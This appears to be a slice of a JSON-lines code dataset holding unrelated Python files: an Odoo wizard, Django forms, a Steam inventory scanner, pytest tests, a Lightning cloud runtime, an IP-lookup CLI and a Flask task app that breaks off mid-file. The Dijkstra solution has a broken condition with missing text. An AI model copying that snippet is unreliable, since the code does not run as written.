OBO\n # print(*sorted(obofoundry_entries - miriam_entries - ols_entries), sep='\\n')\n # Some things missing from miriam\n # print(*sorted(obofoundry_entries.union(ols_entries) - miriam_entries), sep='\\n')\n\n # Stuff important enough to make it everywhere\n print(*sorted(set.intersection(ols_entries, miriam_entries, obofoundry_entries)), sep='\\n')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/pyobo/registries/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"630713238","text":"# -*- coding: utf-8 -*-\nimport ast\n\nfrom odoo import models, fields, api, _\n\n\nclass WarningBox(models.TransientModel):\n _name = \"si_core.warning.box\"\n _description = \"SI Core Warning Box\"\n\n # store message to show in a popup confirmation window\n message = fields.Text(default=lambda self: self.env.context.get('message'))\n\n def accept_confirmation(self):\n \"\"\"\n @Override\n write the action for button \"OK\"\n \"\"\"\n default_act = {'type': 'ir.actions.act_window_close'}\n return default_act\n\n def get_action(self, title='Warning', message='There some problems.', view_id=None):\n \"\"\"\n Get the action data to return to client\n :param str title:\n :param str message:\n :param int view_id:\n :return: The action data\n :rtype: dict\n \"\"\"\n if view_id is None:\n view_id = self.env.ref('si_core.view_si_core_warning_box_form').id\n\n action = {\n 'type': 'ir.actions.act_window',\n 'name': _(title),\n 'res_model': 'si_core.warning.box',\n 'view_mode': 'form',\n 'target': 'new',\n 'views': [[view_id, 'form']],\n 'context': {\n 'message': message\n }\n }\n\n return action\n","sub_path":"SI/si_core/wizard/warning_box_model.py","file_name":"warning_box_model.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"632512862","text":"from django import forms\n\nfrom service_api.models.articles import Article\nfrom service_api.models.disciplines import Game\nfrom service_api.models.videos import Video, VideoAttribute\n\n\nclass UpsertVideoForm(forms.Form):\n platform_video_id = forms.CharField(required=True,\n widget=forms.TextInput(attrs={\n 'class': 'form-control'}),\n label='Youtubeの動画ID')\n\n game = forms.ModelChoiceField(required=True,\n queryset=Game.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='ゲームタイトル')\n article = forms.ModelChoiceField(required=False,\n queryset=Article.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='記事タイトル')\n\n\nclass UpsertVideoAttributeForm(forms.ModelForm):\n video = forms.ModelChoiceField(required=True,\n queryset=Video.objects.filter(enabled=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='動画タイトル')\n game = forms.ModelChoiceField(required=True,\n queryset=Game.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='ゲームタイトル')\n article = forms.ModelChoiceField(required=False,\n queryset=Article.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='記事タイトル')\n\n class Meta:\n model = VideoAttribute\n fields = ('video', 'game', 'article', )\n","sub_path":"video/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497659826","text":"#!/usr/bin/env python3\n\nfrom Core.player import Player\nimport threading\nimport time\nimport re\n\nGET_SUMMARIES_URL = 'http://api.steampowered.com/isteamuser/getplayersummaries/v2/?key={0}&steamids=%s'\n\n\nclass BaseScan(threading.Thread):\n def __init__(self, process_manager, tab):\n super().__init__()\n self.process_manager = process_manager\n self.tab = tab\n\n self.end_ = False\n self.start_time = None\n\n self.done = 0\n self.total = 0\n\n self.players_processor = None\n self.steam_id64s = []\n self.requirements = {}\n\n def run(self):\n pass\n\n def finish(self):\n self.reset_button()\n self.tab.finish_scan(self)\n\n def end(self):\n if self.end_:\n return\n self.end_ = True\n self.configure_ending()\n\n def find_ids(self, input_text):\n default_id = (1 << 56) | (1 << 52) | (1 << 32)\n steam_id64s = []\n\n raw_ids = re.findall('[\\d]+', input_text)\n for id64 in raw_ids:\n if (int(id64) & default_id) == default_id:\n steam_id64s.append(int(id64))\n\n steam_id32s = re.findall('STEAM_0:[\\d]:[\\d]+', input_text, re.VERBOSE)\n for id32 in steam_id32s:\n x, y, z = re.findall('[\\d]+', id32)\n id64 = default_id | (int(z) << 1) | int(y)\n steam_id64s.append(id64)\n\n steam_id3s = re.findall('([U:[\\d]:[\\d]+])', input_text, re.VERBOSE)\n for id3 in steam_id3s:\n id64 = default_id | int(re.findall('[\\d]+', id3)[1])\n steam_id64s.append(id64)\n\n return list(set(steam_id64s))\n\n def get_max_hours(self):\n if not self.tab.max_hours:\n return None\n return int(self.tab.max_hours)\n\n def get_minimum_item_value(self):\n return float(self.tab.raw_minimum_item_value)\n\n def get_minimum_player_value(self):\n return float(self.tab.raw_minimum_player_value)\n\n def find_database_items(self, item_defindex, requirements):\n steam_id64s = []\n for item in self.process_manager.database['items'][item_defindex].find(requirements):\n steam_id64s.append(item['player_id'])\n\n return list(set(steam_id64s))\n\n def get_player_summaries(self, players):\n steam_id64s = [player.id64 for player in players]\n url = GET_SUMMARIES_URL.format(self.process_manager.config['api']['steam_api_key']) % steam_id64s\n raw_summaries = self.process_manager.request_manager.make_api_request(url, mode='json', priority=False, tags=(self.tab,))\n\n if self.end_:\n return\n\n summaries = {int(summary['steamid']): summary for summary in raw_summaries['response']['players']}\n for player in players:\n if player.id64 in summaries:\n if summaries[player.id64]['communityvisibilitystate'] == 1:\n continue\n if 'lastlogoff' not in summaries[player.id64]:\n continue\n player.name = summaries[player.id64]['personaname']\n player.avatar = summaries[player.id64]['avatarmedium']\n player.status = summaries[player.id64]['personastate'] if 'gameid' not in summaries[player.id64] else -1\n player.last_online = summaries[player.id64]['lastlogoff']\n\n def scan(self):\n start_time = time.time()\n summary_thread = None\n hours_threads = []\n item_threads = []\n display_threads = []\n\n ids = self.steam_id64s[:]\n players = []\n pending = []\n ready = []\n current_items = []\n current_hours = []\n done = []\n\n self.done = 0\n self.total = len(ids)\n\n self.update_progress()\n\n while ids or players or pending or ready or current_items or current_hours or done:\n time.sleep(0.01)\n if self.end_:\n request_cancel_threads = [threading.Thread(target=self.process_manager.request_manager.cancel_requests, args=(self.tab,))]\n request_cancel_threads[-1].start()\n for id64 in self.steam_id64s:\n request_cancel_threads.append(threading.Thread(target=self.process_manager.request_manager.cancel_requests, args=(id64,)))\n request_cancel_threads[-1].start()\n\n for request_cancel_thread in request_cancel_threads:\n request_cancel_thread.join()\n if summary_thread is not None:\n summary_thread.join()\n for hours_thread in hours_threads:\n hours_thread.join()\n for item_thread in item_threads:\n item_thread.join()\n for display_thread in display_threads:\n display_thread.join()\n self.set_status('Ended - %s %s - %s' % (self.total, 'Player' if self.total == 1 else 'Players', self.run_time(start_time)), 0, 0)\n return\n\n for player in done[:]:\n done.remove(player)\n player.update_database()\n self.done += 1\n self.update_progress()\n if self.tab.display_players == 'True':\n if not player.check(self.tab.f2p, self.tab.marked, self.tab.status, self.get_max_hours()):\n continue\n if not player.check_items(self.requirements, self.get_minimum_item_value(), self.get_minimum_player_value()):\n continue\n display_threads.append(threading.Thread(target=self.tab.display_player, args=(player,)))\n display_threads[-1].start()\n\n for player in current_hours[:]:\n if hours_threads[current_hours.index(player)].is_alive():\n continue\n del hours_threads[current_hours.index(player)]\n current_hours.remove(player)\n done.append(player)\n\n for player in current_items[:]:\n if item_threads[current_items.index(player)].is_alive():\n continue\n del item_threads[current_items.index(player)]\n current_items.remove(player)\n if not player.items:\n self.done += 1\n self.update_progress()\n player.update_failed_database()\n continue\n if not self.tab.collect_hours == 'True':\n done.append(player)\n continue\n current_hours.append(player)\n hours_threads.append(threading.Thread(target=player.get_hours))\n hours_threads[-1].start()\n\n if self.end_:\n continue\n\n running = len(current_items) + len(current_hours)\n if running < int(self.process_manager.config['technical']['simultaneous_scans']):\n for player in ready[:int(self.process_manager.config['technical']['simultaneous_scans']) - running]:\n ready.remove(player)\n\n current_items.append(player)\n item_threads.append(threading.Thread(target=player.get_items))\n item_threads[-1].start()\n\n if summary_thread is not None:\n if not summary_thread.is_alive():\n for player in pending[:]:\n pending.remove(player)\n if player.status == -2:\n player.update_failed_database()\n self.done += 1\n self.update_progress()\n continue\n if not player.check_status(self.tab.status):\n self.done += 1\n self.update_progress()\n continue\n if not player.check_last_online(float(self.tab.raw_last_online)):\n self.done += 1\n self.update_progress()\n continue\n ready.append(player)\n\n summary_thread = None\n\n if len(ready) < 100:\n if players:\n if summary_thread is None:\n pending.extend(players[:100])\n summary_thread = threading.Thread(target=self.get_player_summaries, args=(players[:100],))\n summary_thread.start()\n del players[:100]\n\n if len(players) < 200:\n for id64 in ids[:200]:\n player = Player(self.process_manager, id64)\n ids.remove(id64)\n if player.get_database_player():\n if self.tab.marked != 'Both':\n if str(player.marked) != self.tab.marked:\n self.done += 1\n self.update_progress()\n continue\n if self.get_max_hours() is not None:\n if player.hours is not None:\n if player.hours > self.get_max_hours():\n self.done += 1\n self.update_progress()\n continue\n else:\n if self.tab.marked == 'True':\n self.done += 1\n self.update_progress()\n continue\n players.append(player)\n\n for display_thread in display_threads:\n display_thread.join()\n self.set_status('Success - %s %s - %s' % (self.total, 'Player' if self.total == 1 else 'Players', self.run_time(self.start_time)), 1, 1)\n\n def mark_time(self):\n self.start_time = time.time()\n\n def run_time(self, start_time):\n s = round(time.time() - start_time, 1)\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n time_string = ''\n if h:\n time_string += '%s %s : ' % (h, 'Hour' if h == 1 else 'Hours')\n if m or h:\n time_string += '%s %s : ' % (m, 'Minute' if m == 1 else 'Minutes')\n time_string += '%s %s' % (s, 'Second' if s == 1 else 'Seconds')\n return time_string\n\n def configure_ending(self):\n self.set_status('Ending...', 0, 0)\n\n def set_status(self, message, value, maximum):\n pass\n\n def reset_button(self):\n pass\n\n def update_progress(self):\n if not self.end_:\n self.set_status('Players: %s of %s' % (self.done, self.total), self.done, self.total)\n","sub_path":"src/Scans/basescan.py","file_name":"basescan.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"477445415","text":"import pytest\nimport os\nimport json\n\nimport pandas as pd\n\nfrom nutrition_labels.evaluate import get_training_data, EvaluateGrantTagger\n\nmodel_scores = [\n {\n \"model_1\": {\n \"id_A\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Train\"},\n \"id_B\": { \"Truth\": 0, \"Prediction\": 1, \"Test/train\": \"Test\"},\n \"id_C\": {\"Truth\": 1, \"Prediction\": 0, \"Test/train\": \"Test\"},\n \"id_D\": {\"Truth\": 0, \"Prediction\": 1, \"Test/train\": \"Test\"}\n }\n },\n {\n \"model_2\": {\n \"id_A\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Train\"},\n \"id_B\": { \"Truth\": 0, \"Prediction\": 0, \"Test/train\": \"Test\"},\n \"id_C\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Test\"},\n \"id_D\": {\"Truth\": 0, \"Prediction\": 0, \"Test/train\": \"Test\"}\n }\n },\n ]\n\nexpected_training_data = pd.DataFrame([\n {'Grant ID': 'id_A', 'Truth': 1, 'Test/train': 'Train'},\n {'Grant ID': 'id_B', 'Truth': 0, 'Test/train': 'Test'},\n {'Grant ID': 'id_C', 'Truth': 1, 'Test/train': 'Test'},\n {'Grant ID': 'id_D', 'Truth': 0, 'Test/train': 'Test'}\n ])\n\ndef test_get_training_data(tmp_path):\n\n with open(os.path.join(tmp_path, \"training_information.json\"), \"a\") as f:\n for line in model_scores:\n f.write(json.dumps(line))\n f.write('\\n')\n training_data = get_training_data(tmp_path, grant_id_col='Grant ID')\n\n assert training_data.equals(expected_training_data)\n\ndef test_find_datasets_included():\n\n eval_grant_tagger = EvaluateGrantTagger(\n model_dirs=['model_dir'],\n epmc_file_dir='epmc_file_dir.csv',\n rf_file_dir='rf_file_dir.csv'\n )\n eval_grant_tagger.training_data = expected_training_data\n datasets_included = eval_grant_tagger.find_datasets_included()\n\n assert set(datasets_included) == set(['test', 'EPMC', 'RF'])\n\ndef test_return_dataset():\n\n eval_grant_tagger = EvaluateGrantTagger(\n model_dirs=['model_dir']\n )\n eval_grant_tagger.training_data = expected_training_data\n eval_grant_tagger.training_label_name = 'Truth'\n\n dataset_info = eval_grant_tagger.return_dataset(\"test\")\n \n assert len(dataset_info[\"dataset\"]) == 3\n assert 'id_A' not in dataset_info[\"dataset\"]['Grant ID']\n assert dataset_info[\"label_name\"] == 'Truth'\n","sub_path":"tests/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180206120","text":"import sys\nsys.stdin = open('최소이동거리.txt','r')\n\nT = int(input())\nfor tc in range(1,T+1):\n V,E = map(int,input().split())\n adj = {i:[] for i in range(V+1)}\n for _ in range(E):\n s,e,c = map(int,input().split())\n adj[s].append([e,c])\n\n INF = float('inf')\n dist = [INF] * V\n selected = [False] * V\n\n dist[0] = 0\n cnt = 0\n while cnt < V:\n # dist가 최소인 정점찾기\n min = INF\n u = -1\n for i in range(V):\n if not selected[i] and dist[i] dist[u] +cost:\n dist[w] = dist[u]+cost\n print(dist)\n\n","sub_path":"Algorithm Problem Solvings/5월22일/그래프_Dijkstra.py","file_name":"그래프_Dijkstra.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310186642","text":"import fnmatch\nimport logging\nimport os\nimport random\nimport string\nimport sys\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, Callable, List, Optional, Union\n\nfrom lightning_cloud.openapi import (\n Body3,\n Body4,\n Body7,\n Body8,\n Body9,\n Gridv1ImageSpec,\n V1BuildSpec,\n V1DependencyFileInfo,\n V1Drive,\n V1DriveSpec,\n V1DriveStatus,\n V1DriveType,\n V1EnvVar,\n V1Flowserver,\n V1LightningappInstanceSpec,\n V1LightningappInstanceState,\n V1LightningworkDrives,\n V1LightningworkSpec,\n V1Metadata,\n V1NetworkConfig,\n V1PackageManager,\n V1ProjectClusterBinding,\n V1PythonDependencyInfo,\n V1SourceType,\n V1UserRequestedComputeConfig,\n V1Work,\n)\nfrom lightning_cloud.openapi.rest import ApiException\n\nfrom lightning_app.core.constants import CLOUD_UPLOAD_WARNING, DISABLE_DEPENDENCY_CACHE\nfrom lightning_app.runners.backends.cloud import CloudBackend\nfrom lightning_app.runners.runtime import Runtime\nfrom lightning_app.source_code import LocalSourceCodeDir\nfrom lightning_app.storage import Drive\nfrom lightning_app.utilities.cloud import _get_project\nfrom lightning_app.utilities.dependency_caching import get_hash\nfrom lightning_app.utilities.packaging.app_config import AppConfig, find_config_file\nfrom lightning_app.utilities.packaging.lightning_utils import _prepare_lightning_wheels_and_requirements\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass CloudRuntime(Runtime):\n\n backend: Union[str, CloudBackend] = \"cloud\"\n\n def dispatch(\n self,\n on_before_run: Optional[Callable] = None,\n name: str = \"\",\n cluster_id: str = None,\n **kwargs: Any,\n ):\n \"\"\"Method to dispatch and run the :class:`~lightning_app.core.app.LightningApp` in the cloud.\"\"\"\n # not user facing error ideally - this should never happen in normal user workflow\n if not self.entrypoint_file:\n raise ValueError(\n \"Entrypoint file not provided. Did you forget to \"\n \"initialize the Runtime object with `entrypoint_file` argument?\"\n )\n\n # Determine the root of the project: Start at the entrypoint_file and look for nearby Lightning config files,\n # going up the directory structure. The root of the project is where the Lightning config file is located.\n\n # TODO: verify lightning version\n # _verify_lightning_version()\n config_file = find_config_file(self.entrypoint_file)\n app_config = AppConfig.load_from_file(config_file) if config_file else AppConfig()\n root = config_file.parent if config_file else Path(self.entrypoint_file).absolute().parent\n cleanup_handle = _prepare_lightning_wheels_and_requirements(root)\n repo = LocalSourceCodeDir(path=root)\n self._check_uploaded_folder(root, repo)\n requirements_file = root / \"requirements.txt\"\n # The entry point file needs to be relative to the root of the uploaded source file directory,\n # because the backend will invoke the lightning commands relative said source directory\n app_entrypoint_file = Path(self.entrypoint_file).absolute().relative_to(root)\n\n if name:\n # Override the name if provided by the CLI\n app_config.name = name\n\n app_config.save_to_dir(root)\n\n print(f\"The name of the app is: {app_config.name}\")\n\n work_reqs: List[V1Work] = []\n v1_env_vars = [V1EnvVar(name=k, value=v) for k, v in self.env_vars.items()]\n for flow in self.app.flows:\n for work in flow.works(recurse=False):\n work_requirements = \"\\n\".join(work.cloud_build_config.requirements)\n build_spec = V1BuildSpec(\n commands=work.cloud_build_config.build_commands(),\n python_dependencies=V1PythonDependencyInfo(\n package_manager=V1PackageManager.PIP, packages=work_requirements\n ),\n image=work.cloud_build_config.image,\n )\n user_compute_config = V1UserRequestedComputeConfig(\n name=work.cloud_compute.name,\n count=1,\n disk_size=work.cloud_compute.disk_size,\n preemptible=work.cloud_compute.preemptible,\n shm_size=work.cloud_compute.shm_size,\n )\n\n drive_specs: List[V1LightningworkDrives] = []\n for drive_attr_name, drive in [\n (k, getattr(work, k)) for k in work._state if isinstance(getattr(work, k), Drive)\n ]:\n if drive.protocol == \"lit://\":\n drive_type = V1DriveType.NO_MOUNT_S3\n source_type = V1SourceType.S3\n elif drive.protocol == \"s3://\":\n drive_type = V1DriveType.INDEXED_S3\n source_type = V1SourceType.S3\n else:\n raise RuntimeError(\n f\"unknown drive protocol `{drive.protocol}`. Please verify this \"\n f\"drive type has been configured for use in the cloud dispatcher.\"\n )\n\n drive_specs.append(\n V1LightningworkDrives(\n drive=V1Drive(\n metadata=V1Metadata(\n name=f\"{work.name}.{drive_attr_name}\",\n ),\n spec=V1DriveSpec(\n drive_type=drive_type,\n source_type=source_type,\n source=f\"{drive.protocol}{drive.id}\",\n ),\n status=V1DriveStatus(),\n ),\n mount_location=str(drive.root_folder),\n ),\n )\n\n random_name = \"\".join(random.choice(string.ascii_lowercase) for _ in range(5))\n spec = V1LightningworkSpec(\n build_spec=build_spec,\n cluster_id=cluster_id,\n drives=drive_specs,\n user_requested_compute_config=user_compute_config,\n network_config=[V1NetworkConfig(name=random_name, port=work.port)],\n )\n work_reqs.append(V1Work(name=work.name, spec=spec))\n\n # We need to collect a spec for each flow that contains a frontend so that the backend knows\n # for which flows it needs to start servers by invoking the cli (see the serve_frontend() method below)\n frontend_specs: List[V1Flowserver] = []\n for flow_name in self.app.frontends.keys():\n frontend_spec = V1Flowserver(name=flow_name)\n frontend_specs.append(frontend_spec)\n\n app_spec = V1LightningappInstanceSpec(\n app_entrypoint_file=str(app_entrypoint_file),\n enable_app_server=self.start_server,\n flow_servers=frontend_specs,\n desired_state=V1LightningappInstanceState.RUNNING,\n env=v1_env_vars,\n )\n # if requirements file at the root of the repository is present,\n # we pass just the file name to the backend, so backend can find it in the relative path\n if requirements_file.is_file():\n app_spec.image_spec = Gridv1ImageSpec(\n dependency_file_info=V1DependencyFileInfo(package_manager=V1PackageManager.PIP, path=\"requirements.txt\")\n )\n if not DISABLE_DEPENDENCY_CACHE and not kwargs.get(\"no_cache\"):\n # hash used for caching the dependencies\n app_spec.dependency_cache_key = get_hash(requirements_file)\n # we'll get the default project (quite similar to Github Organization) from the backend\n project = _get_project(self.backend.client)\n\n try:\n list_apps_resp = self.backend.client.lightningapp_v2_service_list_lightningapps_v2(\n project.project_id, name=app_config.name\n )\n if list_apps_resp.lightningapps:\n # There can be only one app with unique project_id<>name pair\n lightning_app = list_apps_resp.lightningapps[0]\n else:\n app_body = Body7(name=app_config.name, can_download_source_code=True)\n lightning_app = self.backend.client.lightningapp_v2_service_create_lightningapp_v2(\n project.project_id, app_body\n )\n\n release_body = Body8(\n app_entrypoint_file=app_spec.app_entrypoint_file,\n enable_app_server=app_spec.enable_app_server,\n flow_servers=app_spec.flow_servers,\n image_spec=app_spec.image_spec,\n cluster_id=cluster_id,\n works=[V1Work(name=work_req.name, spec=work_req.spec) for work_req in work_reqs],\n local_source=True,\n dependency_cache_key=app_spec.dependency_cache_key,\n )\n if cluster_id is not None:\n self._ensure_cluster_project_binding(project.project_id, cluster_id)\n\n lightning_app_release = self.backend.client.lightningapp_v2_service_create_lightningapp_release(\n project.project_id, lightning_app.id, release_body\n )\n\n if cluster_id is not None:\n logger.info(f\"running app on {lightning_app_release.cluster_id}\")\n\n if lightning_app_release.source_upload_url == \"\":\n raise RuntimeError(\"The source upload url is empty.\")\n\n repo.package()\n repo.upload(url=lightning_app_release.source_upload_url)\n\n # right now we only allow a single instance of the app\n find_instances_resp = self.backend.client.lightningapp_instance_service_list_lightningapp_instances(\n project.project_id, app_id=lightning_app.id\n )\n if find_instances_resp.lightningapps:\n existing_instance = find_instances_resp.lightningapps[0]\n if existing_instance.status.phase != V1LightningappInstanceState.STOPPED:\n # TODO(yurij): Implement release switching in the UI and remove this\n # We can only switch release of the stopped instance\n existing_instance = self.backend.client.lightningapp_instance_service_update_lightningapp_instance(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body3(spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.STOPPED)),\n )\n # wait for the instance to stop for up to 150 seconds\n for _ in range(150):\n existing_instance = self.backend.client.lightningapp_instance_service_get_lightningapp_instance(\n project_id=project.project_id, id=existing_instance.id\n )\n if existing_instance.status.phase == V1LightningappInstanceState.STOPPED:\n break\n time.sleep(1)\n if existing_instance.status.phase != V1LightningappInstanceState.STOPPED:\n raise RuntimeError(\"Failed to stop the existing instance.\")\n\n lightning_app_instance = (\n self.backend.client.lightningapp_instance_service_update_lightningapp_instance_release(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body4(release_id=lightning_app_release.id),\n )\n )\n\n self.backend.client.lightningapp_instance_service_update_lightningapp_instance(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body3(\n spec=V1LightningappInstanceSpec(\n desired_state=V1LightningappInstanceState.RUNNING, env=v1_env_vars\n )\n ),\n )\n else:\n lightning_app_instance = (\n self.backend.client.lightningapp_v2_service_create_lightningapp_release_instance(\n project.project_id,\n lightning_app.id,\n lightning_app_release.id,\n Body9(\n cluster_id=cluster_id,\n desired_state=V1LightningappInstanceState.RUNNING,\n name=lightning_app.name,\n env=v1_env_vars,\n ),\n )\n )\n except ApiException as e:\n logger.error(e.body)\n sys.exit(1)\n\n if on_before_run:\n on_before_run(lightning_app_instance)\n\n if lightning_app_instance.status.phase == V1LightningappInstanceState.FAILED:\n raise RuntimeError(\"Failed to create the application. Cannot upload the source code.\")\n\n if cleanup_handle:\n cleanup_handle()\n\n def _ensure_cluster_project_binding(self, project_id: str, cluster_id: str):\n cluster_bindings = self.backend.client.projects_service_list_project_cluster_bindings(project_id=project_id)\n\n for cluster_binding in cluster_bindings.clusters:\n if cluster_binding.cluster_id != cluster_id:\n continue\n if cluster_binding.project_id == project_id:\n return\n\n self.backend.client.projects_service_create_project_cluster_binding(\n project_id,\n body=V1ProjectClusterBinding(cluster_id=cluster_id, project_id=project_id),\n )\n\n @staticmethod\n def _check_uploaded_folder(root: Path, repo: LocalSourceCodeDir) -> None:\n \"\"\"This method is used to inform the users if their folder files are large and how to filter them.\"\"\"\n lightning_tar = set(fnmatch.filter(repo.files, \"*lightning-*.tar.gz\"))\n app_folder_size = sum(Path(p).stat().st_size for p in repo.files if p not in lightning_tar)\n app_folder_size_in_mb = round(app_folder_size / (1000 * 1000), 5)\n if app_folder_size_in_mb > CLOUD_UPLOAD_WARNING:\n path_sizes = [(p, Path(p).stat().st_size / (1000 * 1000)) for p in repo.files]\n largest_paths = sorted((x for x in path_sizes if x[-1] > 0.01), key=lambda x: x[1], reverse=True)[:25]\n largest_paths_msg = \"\\n\".join(f\"{round(s, 5)} MB: {p}\" for p, s in largest_paths)\n warning_msg = (\n f\"Your application folder {root} is more than {CLOUD_UPLOAD_WARNING} MB. \"\n f\"Found {app_folder_size_in_mb} MB \\n\"\n \"Here are the largest files: \\n\"\n f\"{largest_paths_msg}\"\n )\n if not os.path.exists(os.path.join(root, \".lightningignore\")):\n warning_msg = (\n warning_msg\n + \"\\nIn order to ignore some files or folder, \"\n + \"create a `.lightningignore` file and add the paths to ignore.\"\n )\n else:\n warning_msg += \"\\nYou can ignore some files or folders by adding them to `.lightningignore`.\"\n logger.warning(warning_msg)\n","sub_path":"src/lightning_app/runners/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":15587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229983309","text":"# -*- coding: utf-8 -*-\n\"\"\"Demo story.\n\"\"\"\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.append('storybuilder')\nfrom storybuilder.builder.world import World\nfrom storybuilder.builder.writer import Writer\n\nW = Writer\n\n## scenes\ndef sc_whiteblack(w: World):\n aka, kuro = W(w.akane), W(w.kuro)\n return w.scene(\"白と黒だけ\", \"彼女は色を捨てて白と黒だけで彼を描いた\",\n aka.talk(\"なんで?\"),\n aka.look(\"買ってきたチキンを\"),\n kuro.talk(\"クリスマスで安く売ってたからさ\"),\n kuro.look(\"彼女の不機嫌な顔を\"),\n kuro.remember(\"クリスマスが嫌いだと\"),\n kuro.talk(\"別に祝おうってんじゃないから良いだろ\"),\n aka.talk(\"これ\"),\n aka.look(doing=\"キャンバスを見せる\"),\n kuro.look(doing=\"そこには白と黒で描かれた彼の顔がある\"),\n kuro.talk(\"何だよ\"),\n aka.talk(\"クリスマスだからね\"),\n aka.do(\"珍しく微笑\"),\n kuro.talk(\"そっか。あんがと\"),\n kuro.talk(\"これが、お前の世界なのか?\"),\n aka.talk(\"わかんないよ。色はさ。けど、形は触ったから\"),\n kuro.do(\"キスしてやる\"),\n aka.talk(\"クリスマスだからとかって言い訳は必要?\"),\n kuro.talk(\"ただのありががとうだよ\"),\n aka.do(\"嬉しそうにチキンにかじりついた\"),\n )\n\n## episode\ndef ep_demo(w: World):\n return w.episode(\"Demo\", \"モノクロな世界で\",\n sc_whiteblack(w),\n )\n","sub_path":"monochrome/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504760215","text":"import requests\nimport os,sys\nimport time\nfrom api import apiweb\n\nu='\\033[4m'\nw='\\033[00m'\nr='\\033[91m'\nb='\\033[34m'\ny='\\033[33m'\ng='\\033[32m'\n\ndef menu():\n try:\n print (w)\n main()\n except KeyboardInterrupt:\n sys.exit(0)\n\ndef main():\n target = str(input(w+\"[ Web Target ]=> \"))\n print (\"\")\n print (b+'[+]'+w+' Scanning ip location for '+target)\n time.sleep(5)\n x = apiweb.apiweb(9, target)\n print (\"\")\n print (w+\"=================================================\")\n print (g,x)\n print (w+\"=================================================\")\n print (\"\")\n print (b+'[+]'+w+' Done')\n print (\"\")\n dog = str(input(w+\"[ enter ]\"))\n if dog == \" \":\n sys.exit(0)\n else:\n sys.exit(0)\n\nmenu()","sub_path":"modules/webtoolkit/iploclookup.py","file_name":"iploclookup.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238612726","text":"import time # Use to get timestamp\nfrom datetime import datetime # Use to get current date\n\n# import flask modules\nfrom flask import render_template, flash, session, redirect, url_for\n\n# import from self written package 'app'\nfrom app import app, db, moment, admin\nfrom flask_admin.contrib.sqla import ModelView\n\n# import the class from models and forms\nfrom .models import Task\nfrom .forms import taskForm, editForm, searchForm\n\nadmin.add_view(ModelView(Task, db.session))\n\n@app.route('/', methods=['GET'])\ndef root():\n return render_template(\"welcome.html\", title=\"Welcome\",\n current_time=datetime.utcnow())\n\n@app.route('/view_task', methods=['GET'])\ndef view_task():\n tasks = Task.query.order_by(Task.taskDate).all()\n return render_template(\"view_task.html\", title=\"View Task\", \n current_time=datetime.utcnow(), tasks=tasks)\n\n@app.route('/view_task/', methods=['GET'])\ndef view_task_category(kind_s):\n # Dict to map the input (From GET method) and datebase title\n kind_dict = {'name': Task.taskName,\n 'category': Task.taskKind,\n 'status': Task.taskStatus}\n kind = kind_dict.get(kind_s, None)\n # With invalid input from GET\n if not kind:\n return render_template('404.html', title=\"Page Not Found\",\n current_time=datetime.utcnow()), 404\n # Get row(objects) query from the database\n tasks = Task.query.order_by(kind).all()\n return render_template(\"view_task.html\", title=\"View Task\",\n current_time=datetime.utcnow(), tasks=tasks)\n\n@app.route('/create_task', methods=['GET', 'POST'])\ndef create_task():\n # Get data from session (store the data before redirect)\n status = session.get('con')\n if status :\n session.pop('con') # Clear the session parts\n form = taskForm() # Create the form instance\n if form.errors :\n flash('Errors=\"%s\"' % (form.errors))\n # if submit valid, store it into database\n if form.validate_on_submit():\n session['con'] = True # Get the data from session\n tid = int(time.time()) # Get timestamp as task ID\n # Create the database row object\n t = Task(taskId=tid, taskName=form.task_name.data,\n taskStatus=False, taskDate=form.task_date.data,\n taskKind=form.task_kind.data, taskNotice=form.task_notice.data)\n db.session.add(t)\n db.session.commit()\n return redirect(url_for('create_task'))\n return render_template(\"create_task.html\", title=\"Create Task\", \n current_time=datetime.utcnow(), \n form = form, \n status = status)\n\n@app.route('/search_task', methods=['GET', 'POST'])\ndef search_task():\n form = searchForm()\n if form.errors:\n flash('Errors=\"%s\"' % (form.errors))\n if form.validate_on_submit():\n if form.task_name.data:\n tasks = Task.query.filter_by(taskName=form.task_name.data).all()\n else :\n tasks = Task.query.all()\n task0 = 